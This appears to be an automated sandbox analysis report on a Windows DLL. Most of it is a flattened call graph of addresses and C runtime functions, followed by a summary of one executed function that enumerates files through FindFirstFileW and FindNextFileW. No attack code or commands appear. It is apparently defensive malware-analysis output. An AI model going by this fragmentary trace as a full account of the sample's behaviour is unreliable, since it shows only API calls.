7719->7720 7721 234b1f01 7719->7721 7730 234b23ec 7720->7730 7721->7724 7725 234b240b 7721->7725 7724->7708 7738 234b53e5 7725->7738 7831 234b3513 7730->7831 7735 234b2408 7735->7724 7736 234b351e 7 API calls 7737 234b23f5 7736->7737 7737->7724 7744 234b5aca 7738->7744 7741 234b351e 7820 234b3820 7741->7820 7743 234b2415 7743->7724 7745 234b2410 7744->7745 7746 234b5ad4 7744->7746 7745->7741 7747 234b5e08 _abort 11 API calls 7746->7747 7748 234b5adb 7747->7748 7748->7745 7749 234b5e5e _abort 11 API calls 7748->7749 7750 234b5aee 7749->7750 7752 234b59b5 7750->7752 7753 234b59d0 7752->7753 7754 234b59c0 7752->7754 7753->7745 7758 234b59d6 7754->7758 7757 234b571e _free 20 API calls 7757->7753 7759 234b59e9 7758->7759 7762 234b59ef 7758->7762 7760 234b571e _free 20 API calls 7759->7760 7760->7762 7761 234b571e _free 20 API calls 7763 234b59fb 7761->7763 7762->7761 7764 234b571e _free 20 API calls 7763->7764 7765 234b5a06 7764->7765 7766 234b571e _free 20 API calls 7765->7766 7767 234b5a11 7766->7767 7768 234b571e _free 20 API calls 7767->7768 7769 234b5a1c 7768->7769 7770 234b571e _free 20 API calls 7769->7770 7771 234b5a27 7770->7771 7772 234b571e _free 20 API calls 7771->7772 7773 234b5a32 7772->7773 7774 234b571e _free 20 API calls 7773->7774 7775 234b5a3d 7774->7775 7776 234b571e _free 20 API calls 7775->7776 7777 234b5a48 7776->7777 7778 234b571e _free 20 API calls 7777->7778 7779 234b5a56 7778->7779 7784 234b589c 7779->7784 7790 234b57a8 7784->7790 7786 234b58c0 7787 234b58ec 7786->7787 7803 234b5809 7787->7803 7789 234b5910 7789->7757 7791 234b57b4 ___DestructExceptionObject 7790->7791 7798 234b5671 RtlEnterCriticalSection 7791->7798 7793 234b57e8 7799 234b57fd 7793->7799 7794 234b57be 7794->7793 7797 234b571e _free 20 API calls 7794->7797 7796 234b57f5 _abort 7796->7786 7797->7793 7798->7794 7802 234b56b9 RtlLeaveCriticalSection 7799->7802 7801 234b5807 7801->7796 7802->7801 7804 234b5815 ___DestructExceptionObject 7803->7804 7811 234b5671 RtlEnterCriticalSection 7804->7811 7806 234b581f 7812 234b5a7f 7806->7812 7808 234b5832 7816 234b5848 7808->7816 7810 234b5840 _abort 7810->7789 7811->7806 7813 234b5ab5 __fassign 7812->7813 7814 234b5a8e __fassign 7812->7814 7813->7808 7814->7813 7815 234b7cc2 __fassign 20 API calls 7814->7815 7815->7813 7819 234b56b9 RtlLeaveCriticalSection 7816->7819 7818 234b5852 7818->7810 7819->7818 7821 234b382d 7820->7821 7825 234b384b ___vcrt_freefls@4 7820->7825 7822 234b383b 7821->7822 7826 234b3b67 7821->7826 7824 234b3ba2 ___vcrt_FlsSetValue 6 API calls 7822->7824 7824->7825 7825->7743 7827 234b3a82 try_get_function 5 API calls 7826->7827 7828 234b3b81 7827->7828 7829 234b3b99 TlsGetValue 7828->7829 7830 234b3b8d 7828->7830 7829->7830 7830->7822 7837 234b3856 7831->7837 7833 234b23f1 7833->7737 7834 234b53da 7833->7834 7835 234b5b7a _abort 20 API calls 7834->7835 7836 234b23fd 7835->7836 7836->7735 7836->7736 7838 234b385f 7837->7838 7839 234b3862 GetLastError 7837->7839 7838->7833 7840 234b3b67 ___vcrt_FlsGetValue 6 API calls 7839->7840 7841 234b3877 7840->7841 7842 234b38dc SetLastError 7841->7842 7843 234b3ba2 ___vcrt_FlsSetValue 6 API calls 7841->7843 7848 234b3896 7841->7848 7842->7833 7844 234b3890 7843->7844 7845 234b38b8 7844->7845 7846 234b3ba2 ___vcrt_FlsSetValue 6 API calls 7844->7846 7844->7848 7847 234b3ba2 ___vcrt_FlsSetValue 6 API calls 7845->7847 7845->7848 7846->7845 7847->7848 7848->7842 7912 234b4a9a 7915 234b5411 7912->7915 7916 234b541d _abort 7915->7916 7917 234b5af6 _abort 38 API calls 7916->7917 7920 234b5422 7917->7920 7918 234b55a8 _abort 38 API calls 7919 234b544c 7918->7919 7920->7918 7661 234b2418 7662 234b2420 ___scrt_release_startup_lock 7661->7662 7665 234b47f5 7662->7665 7664 234b2448 7666 234b4808 7665->7666 7667 234b4804 7665->7667 7670 234b4815 7666->7670 7667->7664 7671 234b5b7a _abort 20 API calls 7670->7671 7674 234b482c 7671->7674 7672 234b2ada _ValidateLocalCookies 5 API calls 7673 234b4811 7672->7673 7673->7664 7674->7672 6977 234b4bdd 6978 234b4c08 6977->6978 6979 234b4bec 6977->6979 7000 234b6d60 6978->7000 6979->6978 6980 234b4bf2 6979->6980 6982 234b6368 _free 20 API calls 6980->6982 6984 234b4bf7 6982->6984 6986 234b62ac _abort 26 API calls 6984->6986 6985 234b4c33 7004 234b4d01 6985->7004 6988 234b4c01 6986->6988 6992 234b4c72 6995 234b4d01 38 API calls 6992->6995 6993 234b4c66 6994 234b6368 _free 20 API calls 6993->6994 6999 234b4c6b 6994->6999 6996 234b4c88 6995->6996 6998 234b571e _free 20 API calls 6996->6998 6996->6999 6997 234b571e _free 20 API calls 6997->6988 6998->6999 6999->6997 7001 234b4c0f GetModuleFileNameA 7000->7001 7002 234b6d69 7000->7002 7001->6985 7016 234b6c5f 7002->7016 7006 234b4d26 7004->7006 7008 234b4d86 7006->7008 7198 234b70eb 7006->7198 7007 234b4c50 7010 234b4e76 7007->7010 7008->7007 7009 234b70eb 38 API calls 7008->7009 7009->7008 7011 234b4e8b 7010->7011 7012 234b4c5d 7010->7012 7011->7012 7013 234b637b _abort 20 API calls 7011->7013 7012->6992 7012->6993 7014 234b4eb9 7013->7014 7015 234b571e _free 20 API calls 7014->7015 7015->7012 7017 234b5af6 _abort 38 API calls 7016->7017 7018 234b6c6c 7017->7018 7036 234b6d7e 7018->7036 7020 234b6c74 7045 234b69f3 7020->7045 7023 234b6c8b 7023->7001 7026 234b6cce 7028 234b571e _free 20 API calls 7026->7028 7028->7023 7030 234b6cc9 7031 234b6368 _free 20 API calls 7030->7031 7031->7026 7032 234b6d12 7032->7026 7069 234b68c9 7032->7069 7033 234b6ce6 7033->7032 7034 234b571e _free 20 API calls 7033->7034 7034->7032 7037 234b6d8a ___DestructExceptionObject 7036->7037 7038 234b5af6 _abort 38 API calls 7037->7038 7040 234b6d94 7038->7040 7042 234b55a8 _abort 38 API calls 7040->7042 7043 234b6e18 _abort 7040->7043 7044 234b571e _free 20 API calls 7040->7044 7072 234b5671 RtlEnterCriticalSection 7040->7072 7073 234b6e0f 7040->7073 7042->7040 7043->7020 7044->7040 7077 234b54a7 7045->7077 7048 234b6a26 7050 234b6a3d 7048->7050 7051 234b6a2b GetACP 7048->7051 7049 234b6a14 GetOEMCP 7049->7050 7050->7023 7052 234b56d0 7050->7052 7051->7050 7053 234b570e 7052->7053 7057 234b56de _abort 7052->7057 7054 234b6368 _free 20 API calls 7053->7054 7056 234b570c 7054->7056 7055 234b56f9 RtlAllocateHeap 7055->7056 7055->7057 7056->7026 7059 234b6e20 7056->7059 7057->7053 7057->7055 7058 234b474f _abort 7 API calls 7057->7058 7058->7057 7060 234b69f3 40 API calls 7059->7060 7061 234b6e3f 7060->7061 7064 234b6e90 IsValidCodePage 7061->7064 7066 234b6e46 7061->7066 7068 234b6eb5 ___scrt_fastfail 7061->7068 7062 234b2ada _ValidateLocalCookies 5 API calls 7063 234b6cc1 7062->7063 7063->7030 7063->7033 7065 234b6ea2 GetCPInfo 7064->7065 7064->7066 7065->7066 7065->7068 7066->7062 7089 234b6acb GetCPInfo 7068->7089 7162 234b6886 7069->7162 7071 234b68ed 7071->7026 7072->7040 7076 234b56b9 RtlLeaveCriticalSection 7073->7076 7075 234b6e16 7075->7040 7076->7075 7078 234b54c4 7077->7078 7079 234b54ba 7077->7079 7078->7079 7080 234b5af6 _abort 38 API calls 7078->7080 7079->7048 7079->7049 7081 234b54e5 7080->7081 7082 234b7a00 __fassign 38 API calls 7081->7082 7083 234b54fe 7082->7083 7085 234b7a2d 7083->7085 7086 234b7a40 7085->7086 7087 234b7a55 7085->7087 7086->7087 7088 234b6d7e __fassign 38 API calls 7086->7088 7087->7079 7088->7087 7090 234b6b05 7089->7090 7098 234b6baf 7089->7098 7099 234b86e4 7090->7099 7093 234b2ada _ValidateLocalCookies 5 API calls 7095 234b6c5b 7093->7095 7095->7066 7097 234b8a3e 43 API calls 7097->7098 7098->7093 7100 234b54a7 __fassign 38 API calls 7099->7100 7101 234b8704 MultiByteToWideChar 7100->7101 7103 234b8742 7101->7103 7111 234b87da 7101->7111 7104 234b8763 ___scrt_fastfail 7103->7104 7107 234b56d0 21 API calls 7103->7107 7106 234b87d4 7104->7106 7110 234b87a8 MultiByteToWideChar 7104->7110 7105 234b2ada _ValidateLocalCookies 5 API calls 7108 234b6b66 7105->7108 7118 234b8801 7106->7118 7107->7104 7113 234b8a3e 7108->7113 7110->7106 7112 234b87c4 GetStringTypeW 7110->7112 7111->7105 7112->7106 7114 234b54a7 __fassign 38 API calls 7113->7114 7115 234b8a51 7114->7115 7122 234b8821 7115->7122 7119 234b881e 7118->7119 7120 234b880d 7118->7120 7119->7111 7120->7119 7121 234b571e _free 20 API calls 7120->7121 7121->7119 7124 234b883c 7122->7124 7123 234b8862 MultiByteToWideChar 7125 234b8a16 7123->7125 7126 234b888c 7123->7126 7124->7123 7127 234b2ada _ValidateLocalCookies 5 API calls 7125->7127 7129 234b56d0 21 API calls 7126->7129 7131 234b88ad 7126->7131 7128 234b6b87 7127->7128 7128->7097 7129->7131 7130 234b88f6 MultiByteToWideChar 7132 234b890f 7130->7132 7148 234b8962 7130->7148 7131->7130 7131->7148 7149 234b5f19 7132->7149 7134 234b8801 __freea 20 API calls 7134->7125 7136 234b8939 7138 234b5f19 11 API calls 7136->7138 7136->7148 7137 234b8971 7140 234b56d0 21 API calls 7137->7140 7143 234b8992 7137->7143 7138->7148 7139 234b8a07 7142 234b8801 __freea 20 API calls 7139->7142 7140->7143 7141 234b5f19 11 API calls 7144 234b89e6 7141->7144 7142->7148 7143->7139 7143->7141 7144->7139 7145 234b89f5 WideCharToMultiByte 7144->7145 7145->7139 7146 234b8a35 7145->7146 7147 234b8801 __freea 20 API calls 7146->7147 7147->7148 7148->7134 7150 234b5c45 _abort 5 API calls 7149->7150 7151 234b5f40 7150->7151 7153 234b5f49 7151->7153 7157 234b5fa1 7151->7157 7155 234b2ada _ValidateLocalCookies 5 API calls 7153->7155 7156 234b5f9b 7155->7156 7156->7136 7156->7137 7156->7148 7158 234b5c45 _abort 5 API calls 7157->7158 7159 234b5fc8 7158->7159 7160 234b2ada _ValidateLocalCookies 5 API calls 7159->7160 7161 234b5f89 LCMapStringW 7160->7161 7161->7153 7163 234b6892 ___DestructExceptionObject 7162->7163 7170 234b5671 RtlEnterCriticalSection 7163->7170 7165 234b689c 7171 234b68f1 7165->7171 7169 234b68b5 _abort 7169->7071 7170->7165 7183 234b7011 7171->7183 7173 234b693f 7174 234b7011 26 API calls 7173->7174 7175 234b695b 7174->7175 7176 234b7011 26 API calls 7175->7176 7177 234b6979 7176->7177 7178 234b571e _free 20 API calls 7177->7178 7179 234b68a9 7177->7179 7178->7179 7180 234b68bd 7179->7180 7197 234b56b9 RtlLeaveCriticalSection 7180->7197 7182 234b68c7 7182->7169 7184 234b7022 7183->7184 7193 234b701e 7183->7193 7185 234b7029 7184->7185 7188 234b703c ___scrt_fastfail 7184->7188 7186 234b6368 _free 20 API calls 7185->7186 7187 234b702e 7186->7187 7189 234b62ac _abort 26 API calls 7187->7189 7190 234b706a 7188->7190 7191 234b7073 7188->7191 7188->7193 7189->7193 7192 234b6368 _free 20 API calls 7190->7192 7191->7193 7195 234b6368 _free 20 API calls 7191->7195 7194 234b706f 7192->7194 7193->7173 7196 234b62ac _abort 26 API calls 7194->7196 7195->7194 7196->7193 7197->7182 7201 234b7092 7198->7201 7202 234b54a7 __fassign 38 API calls 7201->7202 7203 234b70a6 7202->7203 7203->7006 7675 234b281c 7676 234b2882 std::exception::exception 27 API calls 7675->7676 7677 234b282a 7676->7677 6693 234b5351 6694 234b5374 6693->6694 6695 234b5360 6693->6695 6696 234b571e _free 20 API calls 6694->6696 6695->6694 6698 234b571e _free 20 API calls 6695->6698 6697 234b5386 6696->6697 6699 234b571e _free 20 API calls 6697->6699 6698->6694 6700 234b5399 6699->6700 6701 234b571e _free 20 API calls 6700->6701 6702 234b53aa 6701->6702 6703 234b571e _free 20 API calls 6702->6703 6704 234b53bb 6703->6704 7849 234b36d0 7850 234b36e2 7849->7850 7852 234b36f0 @_EH4_CallFilterFunc@8 7849->7852 7851 234b2ada _ValidateLocalCookies 5 API calls 7850->7851 7851->7852 7921 234b3c90 RtlUnwind 7853 234b4ed7 7854 234b6d60 51 API calls 7853->7854 7855 234b4ee9 7854->7855 7864 234b7153 GetEnvironmentStringsW 7855->7864 7859 234b571e _free 20 API calls 7860 234b4f29 7859->7860 7861 234b4eff 7862 234b571e _free 20 API calls 7861->7862 7863 234b4ef4 7862->7863 7863->7859 7865 234b716a 7864->7865 7875 234b71bd 7864->7875 7868 234b7170 WideCharToMultiByte 7865->7868 7866 234b4eee 7866->7863 7876 234b4f2f 7866->7876 7867 234b71c6 FreeEnvironmentStringsW 7867->7866 7869 234b718c 7868->7869 7868->7875 7870 234b56d0 21 API calls 7869->7870 7871 234b7192 7870->7871 7872 234b7199 WideCharToMultiByte 7871->7872 7873 234b71af 7871->7873 7872->7873 7874 234b571e _free 20 API calls 7873->7874 7874->7875 7875->7866 7875->7867 7877 234b4f44 7876->7877 7878 234b637b _abort 20 API calls 7877->7878 7889 234b4f6b 7878->7889 7879 234b4fcf 7880 234b571e _free 20 API calls 7879->7880 7881 234b4fe9 7880->7881 7881->7861 7882 234b637b _abort 20 API calls 7882->7889 7883 234b4fd1 7884 234b5000 20 API calls 7883->7884 7886 234b4fd7 7884->7886 7885 234b544d ___std_exception_copy 26 API calls 7885->7889 7887 234b571e _free 20 API calls 7886->7887 7887->7879 7888 234b4ff3 7890 234b62bc _abort 11 API calls 7888->7890 7889->7879 7889->7882 7889->7883 7889->7885 7889->7888 7891 234b571e _free 20 API calls 7889->7891 7892 234b4fff 7890->7892 7891->7889 7204 234b73d5 7205 234b73e1 ___DestructExceptionObject 7204->7205 7216 234b5671 RtlEnterCriticalSection 7205->7216 7207 234b73e8 7217 234b8be3 7207->7217 7209 234b73f7 7210 234b7406 7209->7210 7230 234b7269 GetStartupInfoW 7209->7230 7241 234b7422 7210->7241 7213 234b7417 _abort 7216->7207 7218 234b8bef ___DestructExceptionObject 7217->7218 7219 234b8bfc 7218->7219 7220 234b8c13 7218->7220 7222 234b6368 _free 20 API calls 7219->7222 7244 234b5671 RtlEnterCriticalSection 7220->7244 7223 234b8c01 7222->7223 7224 234b62ac _abort 26 API calls 7223->7224 7226 234b8c0b _abort 7224->7226 7225 234b8c4b 7252 234b8c72 7225->7252 7226->7209 7227 234b8c1f 7227->7225 7245 234b8b34 7227->7245 7231 234b7318 7230->7231 7232 234b7286 7230->7232 7236 234b731f 7231->7236 7232->7231 7233 234b8be3 27 API calls 7232->7233 7234 234b72af 7233->7234 7234->7231 7235 234b72dd GetFileType 7234->7235 7235->7234 7237 234b7326 7236->7237 7238 234b7369 GetStdHandle 7237->7238 7239 234b73d1 7237->7239 7240 234b737c GetFileType 7237->7240 7238->7237 7239->7210 7240->7237 7263 234b56b9 RtlLeaveCriticalSection 7241->7263 7243 234b7429 7243->7213 7244->7227 7246 234b637b _abort 20 API calls 7245->7246 7247 234b8b46 7246->7247 7251 234b8b53 7247->7251 7255 234b5eb7 7247->7255 7248 234b571e _free 20 API calls 7250 234b8ba5 7248->7250 7250->7227 7251->7248 7262 234b56b9 RtlLeaveCriticalSection 7252->7262 7254 234b8c79 7254->7226 7256 234b5c45 _abort 5 API calls 7255->7256 7257 234b5ede 7256->7257 7258 234b5efc InitializeCriticalSectionAndSpinCount 7257->7258 7259 234b5ee7 7257->7259 7258->7259 7260 234b2ada _ValidateLocalCookies 5 API calls 7259->7260 7261 234b5f13 7260->7261 7261->7247 7262->7254 7263->7243 7616 234bac6b 7617 234bac84 __startOneArgErrorHandling 7616->7617 7619 234bacad __startOneArgErrorHandling 7617->7619 7620 234bb2f0 7617->7620 7621 234bb329 __startOneArgErrorHandling 7620->7621 7622 234bb5c1 __raise_exc RaiseException 7621->7622 7623 234bb350 __startOneArgErrorHandling 7621->7623 7622->7623 7624 234bb393 7623->7624 7625 234bb36e 7623->7625 7626 234bb8b2 __startOneArgErrorHandling 20 API calls 7624->7626 7631 234bb8e1 7625->7631 7628 234bb38e __startOneArgErrorHandling 7626->7628 7629 234b2ada _ValidateLocalCookies 5 API calls 7628->7629 7630 234bb3b7 7629->7630 7630->7619 7632 234bb8f0 7631->7632 7633 234bb90f __startOneArgErrorHandling 7632->7633 7634 234bb964 __startOneArgErrorHandling 7632->7634 7635 234b78a3 __startOneArgErrorHandling 5 API calls 7633->7635 7636 234bb8b2 __startOneArgErrorHandling 20 API calls 7634->7636 7637 234bb950 7635->7637 7639 234bb95d 7636->7639 7638 234bb8b2 __startOneArgErrorHandling 20 API calls 7637->7638 7637->7639 7638->7639 7639->7628 7678 234b742b 7679 234b7430 7678->7679 7681 234b7453 7679->7681 7682 234b8bae 7679->7682 7683 234b8bbb 7682->7683 7687 234b8bdd 7682->7687 7684 234b8bc9 RtlDeleteCriticalSection 7683->7684 7685 234b8bd7 7683->7685 7684->7684 7684->7685 7686 234b571e _free 20 API calls 7685->7686 7686->7687 7687->7679 7640 234b506f 7641 234b5087 7640->7641 7642 234b5081 7640->7642 7643 234b5000 20 API calls 7642->7643 7643->7641 7922 234b60ac 7923 234b60dd 7922->7923 7924 234b60b7 7922->7924 7924->7923 7925 234b60c7 FreeLibrary 7924->7925 7925->7924 7353 234b21a1 ___scrt_dllmain_exception_filter 7264 234ba1e0 7267 234ba1fe 7264->7267 7266 234ba1f6 7271 234ba203 7267->7271 7270 234ba298 7270->7266 7271->7270 7272 234baa53 7271->7272 7273 234baa70 RtlDecodePointer 7272->7273 7275 234baa80 7272->7275 7273->7275 7274 234b2ada _ValidateLocalCookies 5 API calls 7277 234ba42f 7274->7277 7276 234bab0d 7275->7276 7278 234bab02 7275->7278 7280 234baab7 7275->7280 7276->7278 7279 234b6368 _free 20 API calls 7276->7279 7277->7266 7278->7274 7279->7278 7280->7278 7281 234b6368 _free 20 API calls 7280->7281 7281->7278 7354 234b81a0 7355 234b81d9 7354->7355 7356 234b81dd 7355->7356 7367 234b8205 7355->7367 7357 234b6368 _free 20 API calls 7356->7357 7359 234b81e2 7357->7359 7358 234b8529 7360 234b2ada _ValidateLocalCookies 5 API calls 7358->7360 7361 234b62ac _abort 26 API calls 7359->7361 7362 234b8536 7360->7362 7363 234b81ed 7361->7363 7364 234b2ada _ValidateLocalCookies 5 API calls 7363->7364 7365 234b81f9 7364->7365 7367->7358 7368 234b80c0 7367->7368 7369 234b80db 7368->7369 7370 234b2ada _ValidateLocalCookies 5 API calls 7369->7370 7371 234b8152 7370->7371 7371->7367 7372 234bc7a7 7373 234bc7be 7372->7373 7377 234bc80d 7372->7377 7373->7377 7381 234bc7e6 GetModuleHandleA 7373->7381 7375 234bc872 7376 234bc835 GetModuleHandleA 7376->7377 7377->7375 7377->7376 7378 234bc85f GetProcAddress 7377->7378 7378->7377 7382 234bc7ef 7381->7382 7387 234bc80d 7381->7387 7390 234bc803 GetProcAddress 7382->7390 7385 234bc872 7386 234bc835 GetModuleHandleA 7386->7387 7387->7385 7387->7386 7389 234bc85f GetProcAddress 7387->7389 7389->7387 7394 234bc80d 7390->7394 7391 234bc872 7392 234bc835 GetModuleHandleA 7392->7394 7393 234bc85f GetProcAddress 7393->7394 7394->7391 7394->7392 7394->7393 7395 234b9db8 7396 234b9dbf 7395->7396 7397 234b9e20 7396->7397 7401 234b9ddf 7396->7401 7398 234baa17 21 API calls 7397->7398 7399 234ba90e 7397->7399 7400 234b9e6e 7398->7400 7401->7399 7402 234baa17 21 API calls 7401->7402 7403 234ba93e 7402->7403 6743 234b1f3f 6744 234b1f4b ___DestructExceptionObject 6743->6744 6761 234b247c 6744->6761 6746 234b1f52 6747 234b1f7c 6746->6747 6748 234b2041 6746->6748 6755 234b1f57 ___scrt_is_nonwritable_in_current_image 6746->6755 6772 234b23de 6747->6772 6788 234b2639 IsProcessorFeaturePresent 6748->6788 6751 234b2048 6752 234b1f8b __RTC_Initialize 6752->6755 6775 234b22fc RtlInitializeSListHead 6752->6775 6754 234b1f99 ___scrt_initialize_default_local_stdio_options 6776 234b46c5 6754->6776 6759 234b1fb8 6759->6755 6784 234b4669 6759->6784 6762 234b2485 6761->6762 6792 234b2933 IsProcessorFeaturePresent 6762->6792 6766 234b2496 6767 234b249a 6766->6767 6803 234b53c8 6766->6803 6767->6746 6770 234b24b1 6770->6746 6771 234b3529 ___vcrt_uninitialize 8 API calls 6771->6767 6839 234b24b5 6772->6839 6774 234b23e5 6774->6752 6775->6754 6777 234b46dc 6776->6777 6778 234b2ada _ValidateLocalCookies 5 API calls 6777->6778 6779 234b1fad 6778->6779 6779->6755 6780 234b23b3 6779->6780 6781 234b23b8 ___scrt_release_startup_lock 6780->6781 6782 234b2933 ___isa_available_init IsProcessorFeaturePresent 6781->6782 6783 234b23c1 6781->6783 6782->6783 6783->6759 6787 234b4698 6784->6787 6785 234b2ada _ValidateLocalCookies 5 API calls 6786 234b46c1 6785->6786 6786->6755 6787->6785 6789 234b264e ___scrt_fastfail 6788->6789 6790 234b26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6789->6790 6791 234b2744 ___scrt_fastfail 6790->6791 6791->6751 6793 234b2491 6792->6793 6794 234b34ea 6793->6794 6795 234b34ef ___vcrt_initialize_winapi_thunks 6794->6795 6806 234b3936 6795->6806 6798 234b34fd 6798->6766 6800 234b3505 6801 234b3510 6800->6801 6802 234b3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6800->6802 6801->6766 6802->6798 6835 234b7457 6803->6835 6807 234b393f 6806->6807 6809 234b3968 6807->6809 6810 234b34f9 6807->6810 6820 234b3be0 6807->6820 6811 234b3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6809->6811 6810->6798 6812 234b38e8 6810->6812 6811->6810 6825 234b3af1 6812->6825 6815 234b38fd 6815->6800 6818 234b3918 6818->6800 6819 234b391b ___vcrt_uninitialize_ptd 6 API calls 6819->6815 6821 234b3a82 try_get_function 5 API calls 6820->6821 6822 234b3bfa 6821->6822 6823 234b3c18 InitializeCriticalSectionAndSpinCount 6822->6823 6824 234b3c03 6822->6824 6823->6824 6824->6807 6826 234b3a82 try_get_function 5 API calls 6825->6826 6827 234b3b0b 6826->6827 6828 234b3b24 TlsAlloc 6827->6828 6829 234b38f2 6827->6829 6829->6815 6830 234b3ba2 6829->6830 6831 234b3a82 try_get_function 5 API calls 6830->6831 6832 234b3bbc 6831->6832 6833 234b3bd7 TlsSetValue 6832->6833 6834 234b390b 6832->6834 6833->6834 6834->6818 6834->6819 6838 234b7470 6835->6838 6836 234b2ada _ValidateLocalCookies 5 API calls 6837 234b24a3 6836->6837 6837->6770 6837->6771 6838->6836 6840 234b24c8 6839->6840 6841 234b24c4 6839->6841 6842 234b2639 ___scrt_fastfail 4 API calls 6840->6842 6844 234b24d5 ___scrt_release_startup_lock 6840->6844 6841->6774 6843 234b2559 6842->6843 6844->6774 7282 234b5bff 7290 234b5d5c 7282->7290 7285 234b5c13 7286 234b5b7a _abort 20 API calls 7287 234b5c1b 7286->7287 7288 234b5c28 7287->7288 7297 234b5c2b 7287->7297 7291 234b5c45 _abort 5 API calls 7290->7291 7292 234b5d83 7291->7292 7293 234b5d9b TlsAlloc 7292->7293 7294 234b5d8c 7292->7294 7293->7294 7295 234b2ada _ValidateLocalCookies 5 API calls 7294->7295 7296 234b5c09 7295->7296 7296->7285 7296->7286 7298 234b5c3b 7297->7298 7299 234b5c35 7297->7299 7298->7285 7301 234b5db2 7299->7301 7302 234b5c45 _abort 5 API calls 7301->7302 7303 234b5dd9 7302->7303 7304 234b5df1 TlsFree 7303->7304 7305 234b5de5 7303->7305 7304->7305 7306 234b2ada _ValidateLocalCookies 5 API calls 7305->7306 7307 234b5e02 7306->7307 7307->7298 7404 234b67bf 7409 234b67f4 7404->7409 7407 234b67db 7408 234b571e _free 20 API calls 7408->7407 7410 234b67cd 7409->7410 7411 234b6806 7409->7411 7410->7407 7410->7408 7412 234b680b 7411->7412 7413 234b6836 7411->7413 7414 234b637b _abort 20 API calls 7412->7414 7413->7410 7420 234b71d6 7413->7420 7415 234b6814 7414->7415 7417 234b571e _free 20 API calls 7415->7417 7417->7410 7418 234b6851 7419 234b571e _free 20 API calls 7418->7419 7419->7410 7421 234b71e1 7420->7421 7422 234b7209 7421->7422 7423 234b71fa 7421->7423 7426 234b7218 7422->7426 7429 234b8a98 7422->7429 7425 234b6368 _free 20 API calls 7423->7425 7428 234b71ff ___scrt_fastfail 7425->7428 7436 234b8acb 7426->7436 7428->7418 7430 234b8ab8 RtlSizeHeap 7429->7430 7431 234b8aa3 7429->7431 7430->7426 7432 234b6368 _free 20 API calls 7431->7432 7433 234b8aa8 7432->7433 7434 234b62ac _abort 26 API calls 7433->7434 7435 234b8ab3 7434->7435 7435->7426 7437 234b8ad8 7436->7437 7438 234b8ae3 7436->7438 7440 234b56d0 21 API calls 7437->7440 7439 234b8aeb 7438->7439 7446 234b8af4 _abort 7438->7446 7441 234b571e _free 20 API calls 7439->7441 7444 234b8ae0 7440->7444 7441->7444 7442 234b8af9 7445 234b6368 _free 20 API calls 7442->7445 7443 234b8b1e RtlReAllocateHeap 7443->7444 7443->7446 7444->7428 7445->7444 7446->7442 7446->7443 7447 234b474f _abort 7 API calls 7446->7447 7447->7446 7688 234b543d 7689 234b5440 7688->7689 7690 234b55a8 _abort 38 API calls 7689->7690 7691 234b544c 7690->7691 7926 234b3eb3 7927 234b5411 38 API calls 7926->7927 7928 234b3ebb 7927->7928 7644 234b9e71 7645 234b9e95 7644->7645 7646 234b9eae 7645->7646 7649 234bac6b __startOneArgErrorHandling 7645->7649 7647 234baa53 21 API calls 7646->7647 7648 234b9ef8 7646->7648 7647->7648 7650 234bb2f0 21 API calls 7649->7650 7651 234bacad __startOneArgErrorHandling 7649->7651 7650->7651 6705 234b3370 6716 234b3330 6705->6716 6717 234b334f 6716->6717 6718 234b3342 6716->6718 6719 234b2ada _ValidateLocalCookies 5 API calls 6718->6719 6719->6717 7308 234b63f0 7309 234b6400 7308->7309 7320 234b6416 7308->7320 7310 234b6368 _free 20 API calls 7309->7310 7311 234b6405 7310->7311 7312 234b62ac _abort 26 API calls 7311->7312 7314 234b640f 7312->7314 7313 234b4e76 20 API calls 7318 234b64e5 7313->7318 7316 234b64ee 7317 234b571e _free 20 API calls 7316->7317 7319 234b6561 7317->7319 7318->7316 7324 234b6573 7318->7324 7338 234b85eb 7318->7338 7347 234b679a 7319->7347 7320->7319 7322 234b6480 7320->7322 7327 234b6580 7320->7327 7322->7313 7325 234b62bc _abort 11 API calls 7324->7325 7326 234b657f 7325->7326 7328 234b658c 7327->7328 7328->7328 7329 234b637b _abort 20 API calls 7328->7329 7330 234b65ba 7329->7330 7331 234b85eb 26 API calls 7330->7331 7332 234b65e6 7331->7332 7333 234b62bc _abort 11 API calls 7332->7333 7334 234b6615 ___scrt_fastfail 7333->7334 7335 234b66b6 FindFirstFileExA 7334->7335 7336 234b6705 7335->7336 7337 234b6580 26 API calls 7336->7337 7342 234b853a 7338->7342 7339 234b854f 7340 234b6368 _free 20 API calls 7339->7340 7341 234b8554 7339->7341 7343 234b857a 7340->7343 7341->7318 7342->7339 7342->7341 7345 234b858b 7342->7345 7344 234b62ac _abort 26 API calls 7343->7344 7344->7341 7345->7341 7346 234b6368 _free 20 API calls 7345->7346 7346->7343 7348 234b67a4 7347->7348 7349 234b67b4 7348->7349 7350 234b571e _free 20 API calls 7348->7350 7351 234b571e _free 20 API calls 7349->7351 7350->7348 7352 234b67bb 7351->7352 7352->7314 7692 234b5630 7693 234b563b 7692->7693 7694 234b5eb7 11 API calls 7693->7694 7695 234b5664 7693->7695 7696 234b5660 7693->7696 7694->7693 7698 234b5688 7695->7698 7699 234b56b4 7698->7699 7700 234b5695 7698->7700 7699->7696 7701 234b569f RtlDeleteCriticalSection 7700->7701 7701->7699 7701->7701

                                                                    Executed Functions

                                                                    Function 234B10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 234B1137
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 234B1151
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B115C
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B116D
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B117C
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 234B1193
                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 234B11D0
                                                                    • FindClose.KERNEL32(00000000), ref: 234B11DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
